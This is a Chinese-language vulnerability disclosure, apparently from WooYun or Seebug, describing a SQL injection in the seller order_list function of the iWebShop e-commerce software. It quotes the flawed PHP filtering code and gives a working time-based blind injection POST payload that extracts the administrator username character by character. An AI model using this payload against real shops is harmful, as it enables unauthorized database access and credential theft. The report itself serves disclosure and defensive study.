Iwebshop最新版注入又一枚

### 简要描述： Iwebshop最新版注入又一枚 ### 详细说明： 看到wooyun上有人提了几个iweshop（2014-11-18更新）的漏洞（ [WooYun: iWebShop开源电子商务系统SQL注入漏洞](http://www.wooyun.org/bugs/wooyun-2014-087202) ），去官网看了看，在2014-12-16 已更新到了 iwebshop2.9.14121000，下下来研究研究，希望不要重复。 注入一枚：POST /index.php?controller=seller&action=order_list POST参数中的search作为一个数组传入，search的KEY and VALUE 都过滤不完全，注入成功，文件在/controllers/seller.php的order_list()方法中 看看代码/controllers/seller.php ``` public function order_list(){ //搜索条件 $seller_id = $this->seller['seller_id']; $search = IFilter::act(IReq::get('search')); $page = IReq::get('page') ? IFilter::act(IReq::get('page'),'int') : 1; //检索条件 list($join,$where) = order_class::getSellerSearchCondition($search); $where .= " and go.seller_id=".$seller_id; //拼接sql $orderHandle = new IQuery('order_goods as og'); $orderHandle->order = "o.id desc"; $orderHandle->fields = "o.*"; $orderHandle->page = $page; $orderHandle->join = $join; $orderHandle->where = $where; $this->search = $search; $this->orderHandle = $orderHandle; $this->redirect('order_list'); } ``` $search 是这样获得的$search = IFilter::act(IReq::get('search'));，去看看IFilter::act /lib/core/util/filter_class.php ``` /** * @brief 对字符串进行过滤处理 * @param string $str 被过滤的字符串 * @param string $type 过滤数据类型 值: int, float, string, text, bool, url * @param int $limitLen 被输入的最大字符个数 , 默认不限制; * @return string 被过滤后的字符串 * @note 默认执行的是string类型的过滤 */ public static function act($str,$type = 'string',$limitLen = false) { if(is_array($str)) { foreach($str as $key => $val) { $resultStr[$key] = self::act($val, $type, $limitLen); } return $resultStr; } else { switch($type) { case "int": return intval($str); break; case "float": return floatval($str); break; case "text": return self::text($str,$limitLen); break; case "bool": return (bool)$str; break; case "url": return self::clearUrl($str); break; case "filename": return self::fileName($str); break; default: return self::string($str,$limitLen); break; } } } ``` 因为在获取$search时，$search = IFilter::act(IReq::get('search')); act()没有指定第二个类型参数，所以，把search 当作string过滤，这里是数字型的，不用闭合单引号，造成注入。 Search最终在/view/sysseller/seller/order_list.html中被带入sql执行 ``` {foreach:items = $this->orderHandle->find()} ``` 测试方法：申请开店后，登录，然后发送下面的post包即可。 Payload:POST提交 ``` search[id]=1 or(select if(ord(mid((select admin_name from admin limit 0,1),1,1))=98,sleep(1),0))# ``` 因为是time-based blind 注入，猜测管理员用户名的第一个字母时，若错误，延迟1s左右，如下图 [<img src="https://images.seebug.org/upload/201501/22233107d9a6cb7ff3c445b5071f3a0072f45a94.jpg" alt="猜测失败副本.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/22233107d9a6cb7ff3c445b5071f3a0072f45a94.jpg) 若正确，延迟7s左右（和数据库中的记录有关）如下图 [<img src="https://images.seebug.org/upload/201501/2223313013f84dadd2e2c67c838ad16aee43cd0e.jpg" alt="猜测成功副本.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201501/2223313013f84dadd2e2c67c838ad16aee43cd0e.jpg) ### 漏洞证明： 见 详细说明